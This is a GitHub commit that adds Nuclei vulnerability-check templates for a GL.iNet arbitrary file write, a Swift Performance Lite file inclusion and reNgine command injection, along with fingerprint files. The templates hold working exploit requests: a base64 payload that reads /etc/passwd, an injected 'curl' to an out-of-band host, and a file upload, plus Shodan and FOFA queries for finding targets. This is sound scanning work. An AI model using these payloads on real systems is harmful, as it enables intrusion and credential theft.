Auto Update Nuclei [Sat Dec 7 18:27:15 UTC 2024] :robot:

0x727 · Dec 7, 2024 · bec8f8e · bec8f8e
1 parent 1615622
commit bec8f8e
Show file tree

Hide file tree

Showing 8 changed files with 263 additions and 2 deletions.
diff --git a/plugins/adobe/experience_manager/CVE-2019-16469.yaml b/plugins/adobe/experience_manager/CVE-2019-16469.yaml
@@ -57,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022065203f5addf45bab167e4507f2a74b7c5a5efc033cfeb23c98fc6d5bb2ac4f6f022049e26d8aa6fa978c19401a6a02884eea4022cb74594e7cff01d5e07559bdf5d0:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d972b038916bdc77cbe8379f0314d9c50aec09fae1af11cf1473e110aa202a9f0221009cc28086f81a74c38f7735bcf938ba235f8eae6752ef13ca580bf1ec7d45c2fb:922c64590222798bb761d5b6d8e72950
diff --git a/plugins/apache/solr/CVE-2024-45216.yaml b/plugins/apache/solr/CVE-2024-45216.yaml
@@ -51,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205d6256a3d9a8f4ca73792972bc5f4e7f48fbfb445e9b979ee1907492ec0af95002200ac1c33be48f5b517bc53a954f76086daada0c800fac5cf55a6e648f8ab861fd:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220672a2f3e28b4efc73aa421475fb7345136d64d355af9a750cb5376786c04a94e022100bb379fd032dfd923f37d2d3fa360c7802bc11d41adac29d5e28141f469508ffb:922c64590222798bb761d5b6d8e72950
diff --git a/plugins/gl-inet/gl-ar300m_firmware/CVE-2023-46455.yaml b/plugins/gl-inet/gl-ar300m_firmware/CVE-2023-46455.yaml
@@ -0,0 +1,81 @@
+id: CVE-2023-46455
+
+info:
+  name: GL.iNet <= 4.3.7 - Arbitrary File Write
+  author: Zierax
+  severity: high
+  description: |
+    GL.iNet <= 4.3.7 is vulnerable to an arbitrary file write exploit, allowing an attacker to overwrite arbitrary system files.
+  reference:
+    - https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities/blob/main/CVE-2023-46455.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-46455
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-46455
+    cwe-id: CWE-22
+    cpe: cpe:2.3:o:gl-inet:gl-ar300m_firmware:4.3.7:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: gl-inet
+    product: gl-ar300m_firmware
+    shodan-query: title:"GL.iNet Admin Panel"
+  tags: cve,cve2023,gl-net,file-upload,intrusive
+
+variables:
+  string: "{{to_lower(rand_text_alpha(5))}}"
+  file: "{{to_lower(rand_text_alpha(4))}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "GL.iNet"
+        internal: true
+        case-insensitive: true
+
+  - raw:
+      - |
+        POST /upload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835
+        X-Requested-With: XMLHttpRequest
+
+        -----------------------------81419250823331111993422505835
+        Content-Disposition: form-data; name="sid"
+
+        {{auth_token}}
+        -----------------------------81419250823331111993422505835
+        Content-Disposition: form-data; name="size"
+
+        4
+        -----------------------------81419250823331111993422505835
+        Content-Disposition: form-data; name="path"
+
+        /tmp/{{string}}
+        -----------------------------81419250823331111993422505835
+        Content-Disposition: form-data; name="file"; filename="{{file}}"
+        Content-Type: application/octet-stream
+
+        {{string}}
+        -----------------------------81419250823331111993422505835--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "File uploaded successfully"
+
+      - type: status
+        status:
+          - 200
+# digest: 4a0a004730450221009706a6d0d5bce1b42f3609f3063bd35cfd250ad7672a3c70f452deb72116af27022059002b0dbe36bd0023f689d709b411e048469e49aee6a1ff0bf883ba4d1ef5cb:922c64590222798bb761d5b6d8e72950
diff --git a/plugins/swiftperformance/swift_performance_lite/CVE-2024-10516.yaml b/plugins/swiftperformance/swift_performance_lite/CVE-2024-10516.yaml
@@ -0,0 +1,58 @@
+id: CVE-2024-10516
+
+info:
+  name: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion
+  author: ritikchaddha
+  severity: high
+  description: |
+    A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.
+  reference:
+    - https://github.com/RandomRobbieBF/CVE-2024-10516
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-10516
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-10516
+    cwe-id: CWE-98
+    cpe: cpe:2.3:a:swiftperformance:swift_performance_lite:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: swiftperformance
+    product: swift_performance_lite
+    fofa-query: body="/wp-content/plugins/swift-performance-lite"
+  tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/2
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/wp-content/plugins/swift-performance-lite"
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+# digest: 490a0046304402206aa70c34a31a4404558a038e638c3e19ba8ec44d07d507196a81710ccfbe790202201c4e4d56ee8a8531dbbe1023342cc5533f469b7dc9162e70b62e95cd045d38a9:922c64590222798bb761d5b6d8e72950
diff --git a/plugins/yogeshojha/rengine/CVE-2023-50094.yaml b/plugins/yogeshojha/rengine/CVE-2023-50094.yaml
@@ -0,0 +1,62 @@
+id: CVE-2023-50094
+
+info:
+  name: reNgine 2.2.0 - Command Injection
+  author: Zierax
+  severity: high
+  description: |
+    reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.
+  reference:
+    - https://github.com/yogeshojha/rengine
+    - https://github.com/Zierax/CVE-2023-50094_POC
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-50094
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-50094
+    cwe-id: CWE-78
+    cpe: cpe:2.3:a:yogeshojha::*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 2
+    vendor: yogeshojha
+    product: rengine
+    shodan-query: title:"reNgine"
+  tags: cve,cve2023,rengine,rce,injection,authenticated
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(tolower(body), "rengine")'
+        internal: true
+
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /scan-engine/update HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"nmap_cmd": 'curl {{interactsh-url}}'}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol_2, "dns")'
+          - 'status_code_2 == 200'
+        condition: and
+# digest: 4b0a00483046022100fd49889ceee844270469df825dc24d149b0ad1cfcea1e5c1da8cf5c6cc451121022100a5c21df8088029d5251638baab6d55f0d7a800c75322da1f97e7a0208051f70f:922c64590222798bb761d5b6d8e72950
diff --git a/web-fingerprint/gl-inet/gl-ar300m_firmware.yaml b/web-fingerprint/gl-inet/gl-ar300m_firmware.yaml
@@ -0,0 +1,20 @@
+id: gl-ar300m_firmware
+info:
+  name: gl-ar300m_firmware
+  author: cn-kali-team
+  tags: detect,tech,gl-ar300m_firmware
+  severity: info
+  metadata:
+    product: gl-ar300m_firmware
+    shodan-query:
+    - title:"gl.inet admin panel"
+    vendor: gl-inet
+    verified: true
+http:
+- method: GET
+  path:
+  - '{{BaseURL}}/'
+  matchers:
+  - type: regex
+    regex:
+    - (?mi)<title[^>]*>gl.inet admin panel.*?</title>
diff --git a/web-fingerprint/swiftperformance/swift_performance_lite.yaml b/web-fingerprint/swiftperformance/swift_performance_lite.yaml
@@ -0,0 +1,20 @@
+id: swift_performance_lite
+info:
+  name: swift_performance_lite
+  author: cn-kali-team
+  tags: detect,tech,swift_performance_lite
+  severity: info
+  metadata:
+    fofa-query:
+    - body="/wp-content/plugins/swift-performance-lite"
+    product: swift_performance_lite
+    vendor: swiftperformance
+    verified: true
+http:
+- method: GET
+  path:
+  - '{{BaseURL}}/'
+  matchers:
+  - type: word
+    words:
+    - /wp-content/plugins/swift-performance-lite
diff --git a/web-fingerprint/yogeshojha/rengine.yaml b/web-fingerprint/yogeshojha/rengine.yaml
@@ -0,0 +1,20 @@
+id: rengine
+info:
+  name: rengine
+  author: cn-kali-team
+  tags: detect,tech,rengine
+  severity: info
+  metadata:
+    product: rengine
+    shodan-query:
+    - title:"rengine"
+    vendor: yogeshojha
+    verified: true
+http:
+- method: GET
+  path:
+  - '{{BaseURL}}/'
+  matchers:
+  - type: regex
+    regex:
+    - (?mi)<title[^>]*>rengine.*?</title>